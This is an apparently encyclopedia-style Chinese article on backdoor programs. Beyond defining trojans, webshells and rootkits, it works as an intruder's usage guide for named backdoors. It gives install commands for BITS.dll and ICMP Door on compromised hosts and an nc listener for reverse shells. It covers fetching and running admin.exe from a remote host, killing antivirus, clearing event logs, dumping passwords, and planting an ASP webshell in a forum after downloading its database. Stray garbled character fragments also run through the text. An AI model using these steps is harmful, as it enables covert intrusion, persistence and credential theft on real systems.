-
后門程序
后門程序一般是指那些繞過安全性控制而
獲取對程序或系統訪問權【目標就是遠控】的程序方法。在軟件的開發階段,程序員常常會在軟件內創建后門程序以便可以修改程序設計中的缺陷。但是,如果這些后門被其他人知道,或是在發布軟件之前沒有刪除后門程序,那么它就成了安全風險,容易被黑客當成漏洞進行攻擊。
原理
后門程序,跟我們通常所說的"木馬"有聯系也有區別。聯系在於:都是隱藏在用戶系統中向外發送信息,而且本身具有一定
權限,以便
遠程機器對本機的控制。區別在於:木馬是一個完整的軟件,而后門則體積較小且功能都很單一。
后門程序類似於特洛依木馬(簡稱"木馬"),其用途在於潛伏在電腦中,從事搜集信息或便於黑客進入的動作。
后門程序和電腦病毒最大的差別,在於后門程序不一定有自我復制的動作,也就是后門程序不一定會“感染”其它電腦。
后門是一種登錄系統的方法,它不僅繞過系統已有的安全設置,而且還能挫敗系統上各種增強的安全設置。
特點
后門包括從簡單到奇特,有很多的類型。簡單的后門可能只是建立一個新的賬號,或者接管一個很少使用的賬號;復雜的后門(包括木馬)可能會繞過系統的安全認證而對系統有安全存取權。例如一個login程序,當你輸入特定的密碼時,你就能以管理員的權限來存取系統。
后門能相互關聯,而且這個 技術被許多黑客所使用。例如,黑客可能使用密碼破解一個或多個賬號密碼,黑客可能會建立一個或多個賬號。一個黑客可以存取這個系統,黑客可能使用一些 技術或利用系統的某個漏洞來
提升權限。黑客可能會對系統的配置文件進行小部分的修改,以降低系統的防衛性能。也可能會安裝一個
木馬程序,使系統打開一個安全漏洞,以利於黑客完全掌握系統。
后門可以按照很多方式來分類,標准不同自然分類就不同,為了便於大家理解,我們從技術方面來考慮后門程序的分類方法:
網頁后門
網頁后門,網絡上針對
系統漏洞的攻擊事件漸漸少了,因為大家在認識到網絡安全的重要性之后,最簡單卻又最有效的防護辦法:升級,都被大家所認同,所以系統漏洞在以后的歲月中存活的周期會越來越短,而從最近的趨勢來看,腳本漏洞已經漸漸取代了系統漏洞的地位,非常多的人開始研究起腳本漏洞來,sql注入也開始成為各大安全站點首要關注熱點,找到
提升權限的突破口,進而拿到服務器的系統
權限。
asp、CGI、PHP這三個腳本大類在網絡上的普遍運用帶來了腳本后門在這三方面的發展。
線程插入后門
擴展后門
所謂的“
擴展”,是指在功能上有大的提升,比普通的單一功能的后門有很強的使用性,這種后門本身就相當於一個小的
安全工具包,能實現非常多的常見安全功能,適合新手使用————但是,功能越強,個人覺得反而脫離了后門“隱蔽”的初衷,具體看法就看各位使用者的喜好了。
c/s后門
root kit 6o f3H 3B
這個需要單獨說明,其實把它單獨列一個類在這里是不太恰當的,但是,root kit的出現大大改變了后門程序的思維角度和使用理念,可以說一個好的root kit就是一個完全的系統殺手!后文我們講涉及到這方面,一定不會讓大家失望!
上面是按照技術做的分類,除了這些方面,
正向連接后門、反向連接后門等分類也是很常見的,其實如何分類是編程者考慮的事,廣大的使用者就不用考慮那么多了,我們看重的,只是功能!
線程插入
首先我們來簡單解釋一下什么是典型的"線程插入"后門:
這種后門在運行時沒有進程,所有網絡操作均播入到其他應用程序的進程中完成。也就是說,即使受控制端安裝的
防火牆擁有“應用程序訪問權限”的功能,也不能對這樣的后門進行有效的警告和攔截,也就使對方的防火牆形同虛設了!因為對它的查殺比較困難,這種后門本身的功能比較強大,是“居中家旅行、入侵攻擊”的必備品哦!
[2]
使用范圍:wind200/xp/2003
隱蔽程序:★★★★☆
使用難度:★★★☆☆
查殺難度:★★★★☆
BITS其實是Background Intelligent Transfer Servicer的縮寫,可以在不知不覺中實現另一種意義的典型的線程插入后門,有以下特點:進程管理器中看不到;平時沒有端口,只是在系統中充當卧底的角色;提供正向連接和反向連接兩種功能;僅適合用於windows 200/xp/2003。
運用舉例
首先我們用3389登錄上肉雞,確定你有SYSTEM的權限,
將BITS.DLL拷貝到服務器上,執行CMD命令: 4 #R Br A
rundll32.exebits.dll,install
這樣就激活了BIST,程序用這個特征的字符來辨認使用者,也就相當於你的密碼了,然后
卸載:rundll32.exe BITS.dll,Uninstall
這是最簡單的使用,這個后門除了隱蔽性好外,還有兩大特點是非常 值得借鑒的:
端口復用和正
反向連接。雖然很多朋友經常聽到這兩個名詞,但並不了解它們,端口復用就是利用系統正常的TCP端口通訊和控制,比如80、139等,這樣的后門有個非常 大的好處就是非常 隱蔽,不用自己開端口也不會暴露自己的訪問,因為通訊本身就是系統的正常訪問!另一個是反向連接,這個很常 見,也是后門中一個經典思路,因為從
服務器上主動方問外邊是不被禁止的,很多很厲害的防火牆就怕這點!
在本地使用
NC監聽(如:nc -l -p 1234)
輸入激活命令:[email=hkfx@dancewithdolphin[rxell]:1.1.1.1:2222]hkfx@dancewithdolphin[rxell]:1.1.1.1:2222[/email] ^q/hQ , 4
目標主機的CMD將會出現NC監聽的端口2222,這樣就實現了繞過防火牆的功能了。
擴展后門
所謂的擴展后門,在普通意義上理解,可以看成是將非常多的功能集成到了后門里,讓后門本身就可以實現很多功能,方便直接控制肉雞或者
服務器,這類的后門非常受初學者的喜愛,通常集成了文件上傳/下載、
系統用戶檢測、HTTP訪問、終端安裝、端口開放、啟動/停止服務等功能,本身就是個小的工具包,功能強大。
[1]
擴展后門
使用范圍:win2000/xp/2003
隱蔽程度:★★★★☆
使用難度:★★☆☆☆
危害程度:★★★★☆
查殺難度:★★★★☆
這個后門是擴展后門中很有代表性的一個,功能這全面讓人嘆為觀止,它能實現如下比較有特色的功能:
進程管理,可查看,殺進程(支持用進程名或PID來殺進程);
注冊表管現(查看,刪除,增加等功能);服務管理(停止,啟動,枚舉,配置,刪除服務等功能)端口到
程序關聯功能(
fport);系統重啟,關電源,注銷等功能(reboot,poweroff,shutdown,logoff);
嗅探密碼功能;安裝終端,修改終端端口功能;端口重定向功能(多
線程,並且可限制連接者IP);HTTP服務功能(多線程,並且可限制連接者IP);Socd5代理功能(支持兩種不同方式驗證,可限制連接者IP);克隆賬號,檢測克隆賬戶功能(clone,checkclone);加強了的FindpassWord功能(可以得到所有登錄用戶,包括使用克隆賬戶
遠程登錄用戶密碼);HTTP代理(完全匿名,支持oicq、 MSN、mirc等程序);其他輔助功能,http下載,刪除日志,
系統信息,恢復常用關聯,枚舉系統賬戶等。
當網絡上剛推出這個后門的時候,非常多的人用它來替換自己原來使用的后門,一時間各處贊揚之聲迭起,但多為一些普通的打撈手的心聲,其實它和“后門”的原始定義是有出入的:一旦你需要實現越多的功能,那你的程序在執行、隱藏、穩定等方面就需要考慮非常多的問題,一個疏忽就會導致全盤皆敗,所以不建議將此后門用在需要非常隱蔽的地方。
運用舉例
在安裝后門前,需要使用它自帶的EditServer.exe程序對
服務端進行非常詳細的配置,從10個具體配置中,包括了插入
線程、密碼、IP登錄郵件通告等方面,不難看出它的功能是非常強大的,隱蔽性也很強,下面說幾個在入侵中常用的功能,相信經常玩入侵的朋友一定能發現它的強大之處:
[2]
Fport:列出進程到端口的列表,用於發現系統中運行程序所對應的端口,可以用來檢測常見的隱蔽的后門。
Reboot:重啟系統,如果你上傳並運行了其他后門程序,並需要重啟機器以便讓后門正常工作,那使用這個命令吧! Uz
Shell:得到一個Dos Shell,這個不多講了,直接得到
服務器或者肉雞上的cmd shell。
Pskill PID或
程序名:用於殺掉特定的服務,比如殺毒軟件或者是防火牆。
Execute程序:在后台中
執行程序,比如sniffer等。http://ip/文件名 保存文件名:下載程序,直接從網上down一個后門到服務器上。
Installterm端口:在沒有安裝
終端服務的win2k服務版的系統中安裝終端服務,重啟系統后才生效,並可以自定義連接端口,比如不用3389而用其他端口。
StopService/StartService:停止或者啟動某個系統服務,比如telnet。
CleanEvent:刪除
系統日志。
Redirect:TCP數據轉發,這個功能是后門程序中非常出色的一個功能,可以通過某一端口的數據轉發來控制內網的機器,在滲透入侵的時候非常管用!
EnumService:列舉所有自動啟動的服務的資料,比如后門、木馬。
RegEdit:進入注冊表操作模式,熟悉注冊表的使用者終於在后門中找到了福音! !
Findpassword:得到所有登錄用戶密碼,比我們常用的findpass功能可強多了。
總體來講,Wineggdrop shell是后門程序中很出彩的一個,它經過作者幾次大規模的修改和升級,已經趨於穩定,功能的強大當然沒得說,但是由於功能太強大,被查殺和懷疑是難以避免的,所以很多人在使用Wineggdrop shell一段時間后就發現肉雞飛了,其實是很正常的事,我你出不用氣餒,其實用很簡單的方法就可以很好地提高它的隱蔽性,下文將有說明。
相對於Wineggdrop shell來說,獨孤劍客的winshell在功能上就不那么全面了,但是筆者推薦新手更多的使用winshell而不是Wineggdrop shell,
因為winshell功能除了獲得一個shell以外,只加入了一些重啟、關閉
服務器的命令,功能相對簡單,但完全使用系統自帶的cmd來執行命令,對系統學習和掌握也是非常有幫助的!
Winshell和wolf這兩者都是國內早期頂尖的后門程序,程序的編制無疑是非常經典的,新手學習時使用這兩款后門一定能讓你明白很多系統相關東西,了解很多入侵思路和方法。
C/S后門
傳統的
木馬程序常常使用C/S構架,這樣的構架很方便控制,也在一定程度上避免了“萬能密碼”的情況出現,對后門私有化有一定的貢獻,這方面分類比較模糊,很多后門可以歸結到此類中,比如較巧妙的就是ICMP Door了
類型:系統后門
使用范圍:win2000/xp/2003 2Z6
隱蔽程度:★★★★★
使用難度:★★★☆☆
危害程度:★★★★☆
查殺難度:★★★★★
這個后門利用ICMP通道進行通信,所以不開任何端口,只是利用系統本身的ICMP包進行控制安裝成系統服務后,
開機自動運行,可以穿透很多防火牆——很明顯可以看出它的最大特點:不開任何端口~只通過ICMP控制!和上面任何一款后門程序相比,它的
控制方式是很特殊的,連80端口都不用開放,不得不佩服務程序編制都在這方面獨特的思維角度和眼光!
運用舉例
這個后門其實用途最廣的地方在於突破網關后對內網計算機的控制,因為很多機密數據都是放在內網計算機上的,而控制內網計算機並不是我們想到位的商業網絡進行
入侵檢測,它的網絡內部並不像我們常見的內網那樣非常容易入侵和控制,因為該公司本身涉及到一些網絡安全的服務,所以內網
個人計算機的防護是很到位的,在嘗試過很多后門后,最后ICMP Door幫我實現了成功的滲透內網!由此筆者開始愛上這個后門。
首先使用icmpsrv.exe -install參數進行后門的安裝,再使用icmpsend.exe IP進行控制,可以用:[http://xxx.xxx.xxx/admin.exe-hkfx.exe]方式下載文件,保存在[url=file://\\system32\]\\system32\[/url]目錄下,文件名為hkfx.exe,程序名前的“-”不能省去,使用[pslist]還可以列出遠程主機的進程名稱和pid,再使用[pskill id]就可以殺進程了,同樣,輸入普通cmd命令,則遠程主機也就執行了相關的命令。 ~HF1 ? %
這個后門是采用的c/s構架,必須要使用icmpsend才能激活
服務器,但是他也有自己的先天不足:后門依靠ICMP進行通訊,經過沖擊波的洗禮后,很少有服務器還接受ICMP包了,很多都屏蔽掉了它,所以用它來控制服務器不是一個好辦法,這也是我為什么用它來控制內網計算機的原因了——內網很少有人屏蔽ICMP包吧?
賬號后門
海陽頂端
海陽頂端ASP木馬
使用范圍:支持ASP、WEB訪問
使用難度:★☆☆☆☆
危害程序:★★★☆☆
查殺難度:★★★☆☆
服務器系統配置都相對安全,公開的
系統漏洞存在的機會很少,於是腳本方面的漏洞就開始火起來。首先我們通過某種途徑獲得一個服務器的頁面權限(比如利用論壇上傳達室類型未嚴格設置、SQL注入后獲得ASP系統的上傳權限、對已知物理路徑的服務器上傳特定程序),然后我們可以通過簡單的上傳ASP程序或者是直接復制海陽項端的代碼,然后通過WEB訪問這個程序,就能很方便地查閱服務器上的資料了,下面舉個簡單的便子(由於只是簡單的介紹,下文便子不會太難或者太普遍,希望大家理解)。
leadbbs2.77曾經風靡網絡,它是個很典型的ASP論壇,屏蔽了很多可以SQL注入的寺方,但是很多傻瓜級別的
網絡管理員總是喜歡默認安裝,然后啟用論壇,我們只需要很簡單地在IE中輸入:WWW。***。COM/BBS/DATA/LEADBBS。MDB就能夠直接下載該論壇的數據庫了,而且沒有MD5加密哦!,我們直接找到管理員的賬戶和密碼,然后登錄論壇,到管理界面將論壇的“聯系我們”、“幫助”等ASP文件替換成我們的海陽項端代碼,然后執行GUEST權限的CMD命令,方便的上傳/下載將定程序、遠程
執行程序等,這樣一個隱藏的后門就建好了!取得
服務器的SYSTEM權限就看大家自己的辦法了。
一般來講,海洋的功能是非常強大的,而且不容易被查殺(一個朋友采取的方式是:先利用某個腳本漏洞上傳
網頁后門,再通過海洋上傳另一個后門到隱蔽的路徑,然后通過最后上傳的后門來刪除第一次上傳的海洋,這樣后門的存放路徑就可以放得非常深了,普通管理員是很難發現的),如果管理員覺得自己可能中了這里邊樣的后門,可以利用論壇備份來恢復自己的頁面系統,再配合
系統日志、論壇日志等程序檢查系統,發現可疑ASP文件打開看看海洋是很好識別的,再刪除就可以了。
腳本方面的后門還有CGI和PHP兩面三刀大類,使用原理都差不多,這里就不再多介紹,在黑防論壇也收錄了這三種后門,大家可以下載后自己研究。
devil5
類型:系統后門
使用范圍:win200/xp/2003
隱蔽程度:★★★★☆
使用難度:★★☆☆☆
危害程序:★★★★☆
查殺難度:★★★☆☆
同BITS一樣,Devil5也是
線程插入式的后門,和BITS不同的是它可以很方便的在GUI界面下按照自己的使用習慣定制端口和需要插入的線程,適合對系統有一定了解的使用都使用,由於是自定義插入線程,所以它更難被查殺,下面我們來看看它的使用。
道德使用它自帶的配置程序EDITDEVIL5.EXE對后門進行常規的配置,包括
控制端口、插入線程、連接密碼、時間間隔等方面關鍵點是對插入線程的定制,一般設置成系統自帶的SVCHOST,然后運行后門就可以控制了。
我們用TELNET連接上去,連接的格式是:TELNET *** 定制的端口,它和其他后門不同之處在於連接后沒有提示的界面,每次
執行程序也是分開的,必須要每次都有輸入密碼,比如我們丟掉了
服務器和管賬戶,可以激活GUEST后再將GUEST加到管理員權限,記得每次執行命令后加上“>密碼”就可以了:net localgroup administrators guest /add >hkfx,然后你又可以控制服務器了。
很明顯示,同榕哥的BITS相比,DEVIL5有一些缺陷:不能通過系統自帶端口通訊、執行命令比較麻煩,需要每次輸入密碼而且不回顯示輸入內容,很容易出錯。但是,它有自己的優勢:插入
線程可以自已定制,比如設置IE的線程為插入的目標就比較難被查殺:自己提供了專門的查殺工具DELDEVIL5.exe,幫助防護者清理系統;而且它可以任意改名和綁定,使用靈活性上比BITS強……大家選擇哪能款就看自己的喜好了。
另外,PortLess BackDoor等工具也是此類的后門,功能強大,隱蔽性稍差,大家有興趣可以自己研究一下。
root kit
如果說上面的后門程序都各有千秋、各有所長的話,它們和經典的root kit 一比簡直就是小巫見大巫了,那究竟什么樣是root kit呢?
root kit出現於20世紀90年代初,在1994年2月的一篇安全咨詢報告中首先使用了root kit這個名詞。從出現至今,root kit 的
技術發展非常迅速,應用越來越廣泛,檢測難度也越來越大。其中釷對SunOS和Linux兩種操作系統的root kit最多。
很多人有一個誤解,
他們認為root kit 是用作獲得系統root訪問權限的工具。實際上,root kit是攻擊都用來隱蔽自己的蹤跡和保留root訪問權限的工具。通常,攻擊者通過遠程攻擊獲得root訪問權限,進入系統后,攻擊者會在侵入的主機中安裝root kit,然后他將經常通過root kit的后門檢查系統是否有其他的用戶登錄,如果只有自己,攻擊者就開始着手清理日志中的有關信息。通過root kit的嗅探器獲得其他系統的用戶和密碼之后,攻擊者就會利用這些信息侵入其他系統。
從*nix系統上遷移到windows系統下的root kit完全沿襲了這些“可怕”的功能!
網絡上常見的root kit 是內核級后門軟件,用戶可以通過它隱藏文件、進程、系統服、系統驅動、注冊表鍵和鍵值、打開的端口以及虛構可用磁盤窨。程序同時也在內存中偽裝它所做的改動,並且隱身地控制被隱藏進程。程序安裝隱藏后門,注冊隱藏
系統服務並且
安裝系統驅動。該后門技術允許植入reDirector,是非常難以查殺的一個東東,讓很多網絡管員非常頭疼!
Windows Update
詞條圖冊更多圖冊
DBB后門程序
(1)